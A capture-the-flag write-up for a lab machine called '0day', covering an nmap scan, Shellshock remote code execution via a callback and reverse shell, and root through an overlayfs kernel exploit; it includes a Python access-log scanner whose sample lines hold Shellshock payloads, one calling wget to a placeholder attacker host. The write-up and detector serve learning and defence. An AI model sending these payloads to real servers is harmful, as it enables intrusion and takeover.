
0day -- Writeup

Summary -

Pretty fun room which involves a pretty famous vulnerability named as Shellshock. And once we get initial access to machine we can enumerate and get root privileges via overlayfs privilege escalation exploit.

Enumeration -

Nmap, here we go…

nmap scan -

# Nmap 7.92 scan initiated Mon Jan 31 09:40:27 2022 as: nmap -T4 -p- -A -oA port_scan 10.10.152.254  
Nmap scan report for 10.10.152.254  
Host is up (0.16s latency).  
Not shown: 65533 closed tcp ports (reset)  
PORT   STATE SERVICE VERSION  
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:   
|   1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)  
|   2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)  
|   256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)  
|_  256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)  
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))  
|_http-title: 0day  
|_http-server-header: Apache/2.4.7 (Ubuntu)  
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).  
TCP/IP fingerprint:  
OS:SCAN(V=7.92%E=4%D=1/31%OT=22%CT=1%CU=30604%PV=Y%DS=5%DC=T%G=Y%TM=61F7F75  
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)SEQ  
OS:(SP=100%GCD=1%ISR=10D%TI=Z%CI=I%TS=8)OPS(O1=M506ST11NW6%O2=M506ST11NW6%O  
OS:3=M506NNT11NW6%O4=M506ST11NW6%O5=M506ST11NW6%O6=M506ST11)WIN(W1=68DF%W2=  
OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M506NNSN  
OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D  
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O  
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W  
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R  
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)  
  
Network Distance: 5 hops  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  
  
TRACEROUTE (using port 3306/tcp)  
HOP RTT       ADDRESS  
1   13.80 ms  10.17.0.1  
2   ... 4  
5   152.29 ms 10.10.152.254  
  
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
# Nmap done at Mon Jan 31 09:50:56 2022 -- 1 IP address (1 host up) scanned in 628.71 seconds

Looks like ports 22 (SSH) and 80 (HTTP) are open. Tried dirbusting and some manual enumeration but had no luck finding anything interesting… Nikto showed something interesting though…

[nikto]

Looks like it is vulnerable to Shellshock. Let’s research.

https://www.exploit-db.com/docs/48112

Exploitation -

Let’s start an HTTP server on port 80, then use a curl or wget payload to make the target connect back to it, which confirms whether RCE is working.

[request]

[response]

The request from the server is made… Let’s put in a reverse shell… So, we got a shell as the www-data user.
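Whichever way the callback is confirmed, the probe leaves the Shellshock function-definition prefix in the web server’s logs. As an added example (not code from the original post), this Python scanner parses Apache combined-format access-log lines and flags header values that start with the `() {` prefix, reporting the trailing command a vulnerable bash would execute; the log lines and ATTACKER_HOST_PLACEHOLDER are constructed.

```python
import re
from typing import Dict, List

# Constructed sample Apache "combined" access-log lines (not taken from the original post).
# Lines 3 and 4 carry the Shellshock function-definition prefix "() {" in a request header;
# lines 1 and 2 are benign. ATTACKER_HOST_PLACEHOLDER is a placeholder, not a real host.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [31/Jan/2022:09:41:02 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
10.0.0.5 - - [31/Jan/2022:09:41:05 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.0.0.9 - - [31/Jan/2022:09:42:11 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :;}; /usr/bin/wget http://ATTACKER_HOST_PLACEHOLDER/"
10.0.0.9 - - [31/Jan/2022:09:42:30 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "() { ignored;}; echo; /usr/bin/id" "Mozilla/5.0"
"""

# Apache combined format; quoted fields may contain \" escapes, which the alternation tolerates.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Shellshock signature: a bash function definition "() { ... };" at the start of a value that
# mod_cgi exports as an environment variable (HTTP_USER_AGENT, HTTP_REFERER, ...). A vulnerable
# bash keeps parsing after the closing brace, so whatever follows is the injected command.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{.*?\}\s*;")


def scan_access_log(text: str) -> List[Dict[str, object]]:
    """Return one record per logged header value that carries a Shellshock payload."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these separately
        parts = m.group("request").split(" ")
        target = parts[1] if len(parts) > 1 else ""
        # Only Referer and User-Agent are logged in combined format; other headers (Cookie,
        # Host, ...) are equally valid carriers and need a full request capture to inspect.
        for field in ("referer", "ua"):
            s = SHELLSHOCK_RE.search(m.group(field))
            if not s:
                continue
            hits.append({
                "line": lineno,
                "src_ip": m.group("ip"),
                "field": field,
                "target": target,
                # Requests to a CGI path are the ones that actually reach bash via mod_cgi.
                "reaches_cgi": target.startswith("/cgi-bin/"),
                "injected": m.group(field)[s.end():].strip(),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print(hit)
```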

Post Exploitation -

Let’s upload linpeas and run it. linpeas showed we are running a pretty old kernel, and a couple of kernel exploits are available. The overlayfs one worked for me.

[linpeas]

We are getting an error on compiling… Looks like the machine’s path is messed up. Let’s see on Google what it is, fix it, and then compile and run the exploit.

[compile_root]

And now it worked… Yay, we are root!

This post is licensed under CC BY 4.0 by the author.